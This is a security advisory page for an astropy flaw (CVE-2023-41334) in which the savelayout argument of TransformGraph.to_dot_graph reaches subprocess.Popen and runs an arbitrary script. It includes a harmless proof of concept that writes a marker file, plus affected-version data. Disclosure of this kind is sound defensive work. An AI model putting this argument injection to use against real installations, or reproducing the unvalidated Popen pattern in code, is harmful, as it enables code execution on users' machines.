PYSEC-2026-1199
Vulnerability from pysec - Published: 2026-07-07 11:45 - Updated: 2026-07-07 17:23
VLAI
Details
Summary
RCE due to improper input validation in TranformGraph().to_dot_graph function
Details
Due to improper input validation a malicious user can provide a command or a script file as a value to savelayout argument, which will be placed as the first value in a list of arguments passed to subprocess.Popen.
https://github.com/astropy/astropy/blob/9b97d98802ee4f5350a62b681c35d8687ee81d91/astropy/coordinates/transformations.py#L539
Although an error will be raised, the command or script will be executed successfully.
PoC
$ cat /tmp/script
#!/bin/bash
echo astrorce > /tmp/poc.txt
$ python3
Python 3.9.2 (default, Feb 28 2021, 17:03:44)
[GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from astropy.coordinates.transformations import TransformGraph
>>> tg = TransformGraph()
>>> tg.to_dot_graph(savefn="/tmp/1.txt", savelayout="/tmp/script")
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/home/u32i/.local/lib/python3.9/site-packages/astropy/coordinates/transformations.py", line 584, in to_dot_graph
stdout, stderr = proc.communicate(dotgraph)
File "/usr/lib/python3.9/subprocess.py", line 1134, in communicate
stdout, stderr = self._communicate(input, endtime, timeout)
File "/usr/lib/python3.9/subprocess.py", line 1961, in _communicate
input_view = memoryview(self._input)
TypeError: memoryview: a bytes-like object is required, not 'str'
>>>
$ cat /tmp/poc.txt
astrorce
Impact
code execution on the user's machine
Severity
8.4 (High)
Impacted products
| Name | purl | astropy | pkg:pypi/astropy |
|---|
Aliases
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "astropy",
"purl": "pkg:pypi/astropy"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.3.3"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"0.1",
"0.2",
"0.2.1",
"0.2.2",
"0.2.3",
"0.2.4",
"0.2.5",
"0.3",
"0.3.1",
"0.3.2",
"0.4",
"0.4.1",
"0.4.2",
"0.4.3",
"0.4.4",
"0.4.5",
"0.4.6",
"0.4rc1",
"0.4rc2",
"1.0",
"1.0.1",
"1.0.10",
"1.0.11",
"1.0.12",
"1.0.13",
"1.0.2",
"1.0.3",
"1.0.4",
"1.0.5",
"1.0.6",
"1.0.7",
"1.0.8",
"1.0.9",
"1.0rc1",
"1.0rc2",
"1.1",
"1.1.1",
"1.1.2",
"1.1.post1",
"1.1.post2",
"1.1b1",
"1.1rc1",
"1.1rc2",
"1.2",
"1.2.1",
"1.2.2",
"1.2rc1",
"1.3",
"1.3.1",
"1.3.2",
"1.3.3",
"1.3rc1",
"2.0",
"2.0.1",
"2.0.10",
"2.0.11",
"2.0.12",
"2.0.13",
"2.0.14",
"2.0.15",
"2.0.16",
"2.0.2",
"2.0.3",
"2.0.4",
"2.0.5",
"2.0.6",
"2.0.7",
"2.0.8",
"2.0.9",
"2.0rc1",
"3.0",
"3.0.1",
"3.0.2",
"3.0.3",
"3.0.4",
"3.0.5",
"3.0rc1",
"3.0rc2",
"3.1",
"3.1.1",
"3.1.2",
"3.1rc1",
"3.1rc2",
"3.2",
"3.2.1",
"3.2.2",
"3.2.3",
"3.2rc1",
"3.2rc2",
"4.0",
"4.0.1",
"4.0.1.post1",
"4.0.2",
"4.0.3",
"4.0.4",
"4.0.5",
"4.0.6",
"4.0.6.dev27461",
"4.0rc1",
"4.0rc2",
"4.1",
"4.1rc1",
"4.1rc2",
"4.2",
"4.2.1",
"4.2rc1",
"4.3",
"4.3.1",
"4.3.post1",
"4.3rc1",
"5.0",
"5.0.1",
"5.0.2",
"5.0.3",
"5.0.4",
"5.0.5",
"5.0.6",
"5.0.7",
"5.0.8",
"5.0rc1",
"5.0rc2",
"5.1",
"5.1.1",
"5.1rc1",
"5.2",
"5.2.1",
"5.2.2",
"5.2.dev0",
"5.2rc1",
"5.3",
"5.3.1",
"5.3.2",
"5.3rc1"
]
}
],
"aliases": [
"CVE-2023-41334",
"GHSA-h2x6-5jx5-46hf"
],
"details": "### Summary\nRCE due to improper input validation in TranformGraph().to_dot_graph function\n\n### Details\n\nDue to improper input validation a malicious user can provide a command or a script file as a value to `savelayout` argument, which will be placed as the first value in a list of arguments passed to `subprocess.Popen`. \nhttps://github.com/astropy/astropy/blob/9b97d98802ee4f5350a62b681c35d8687ee81d91/astropy/coordinates/transformations.py#L539\nAlthough an error will be raised, the command or script will be executed successfully.\n\n### PoC\n\n```shell\n$ cat /tmp/script\n#!/bin/bash\necho astrorce \u003e /tmp/poc.txt\n```\n```shell\n$ python3\nPython 3.9.2 (default, Feb 28 2021, 17:03:44) \n[GCC 10.2.1 20210110] on linux\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n\u003e\u003e\u003e from astropy.coordinates.transformations import TransformGraph\n\u003e\u003e\u003e tg = TransformGraph()\n\u003e\u003e\u003e tg.to_dot_graph(savefn=\"/tmp/1.txt\", savelayout=\"/tmp/script\")\nTraceback (most recent call last):\n File \"\u003cstdin\u003e\", line 1, in \u003cmodule\u003e\n File \"/home/u32i/.local/lib/python3.9/site-packages/astropy/coordinates/transformations.py\", line 584, in to_dot_graph\n stdout, stderr = proc.communicate(dotgraph)\n File \"/usr/lib/python3.9/subprocess.py\", line 1134, in communicate\n stdout, stderr = self._communicate(input, endtime, timeout)\n File \"/usr/lib/python3.9/subprocess.py\", line 1961, in _communicate\n input_view = memoryview(self._input)\nTypeError: memoryview: a bytes-like object is required, not \u0027str\u0027\n\u003e\u003e\u003e \n```\n```shell\n$ cat /tmp/poc.txt\nastrorce\n```\n\n### Impact\ncode execution on the user\u0027s machine\n",
"id": "PYSEC-2026-1199",
"modified": "2026-07-07T17:23:47.903653Z",
"published": "2026-07-07T11:45:35.644849Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/astropy/astropy/security/advisories/GHSA-h2x6-5jx5-46hf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41334"
},
{
"type": "WEB",
"url": "https://github.com/astropy/astropy/commit/22057d37b1313f5f5a9b5783df0a091d978dccb5"
},
{
"type": "PACKAGE",
"url": "https://github.com/astropy/astropy"
},
{
"type": "WEB",
"url": "https://github.com/astropy/astropy/blob/9b97d98802ee4f5350a62b681c35d8687ee81d91/astropy/coordinates/transformations.py#L539"
},
{
"type": "PACKAGE",
"url": "https://pypi.org/project/astropy"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-h2x6-5jx5-46hf"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "RCE in TranformGraph().to_dot_graph function"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…